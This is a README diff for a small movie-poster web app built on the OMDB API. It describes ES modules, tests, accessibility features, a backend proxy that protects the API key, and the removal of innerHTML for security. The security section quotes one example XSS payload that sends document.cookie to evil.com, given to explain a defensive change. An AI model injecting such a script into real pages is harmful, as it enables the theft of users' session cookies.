PauloCesar1218/Movie-posters-OMDB/README.md

 ### Skeleton Loading
 Shimmer-animated placeholders shown immediately while data loads.
 Provides instant visual feedback and reduces perceived load time.

+### ES Modules
+Frontend code uses now ES modules for better code organization, testability, but mainly for accurate test coverage reporting.
+And now because of this change it requires serving over HTTP (use `npm run serve`).

+### Tests
+Unit tests for core functions and integration tests for user flows (Completed 84 tests with a 94% coverage)

+## Accessibility
+- ARIA labels and semantic roles
+- Keyboard navigation (Tab, Enter, Space, Escape)
+- Screen reader announcements
+- Focus trap in modal dialogs

+## Backend
+I created a very simple backend server to serve as a proxy as secure the api_key that was previouly exposed and hardcoded in the frontend.

+## Removing use of "innerHTML"
+This was an important security change, because innerHTML parses HTML strings, which can execute malicious scripts.
+For example, if OMDB or any other third-party service sends malicious content like `Title: "<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>"` instead of a regular string, innerHTML could allow attackers to exploit and steal user information.

 ## Potential Improvements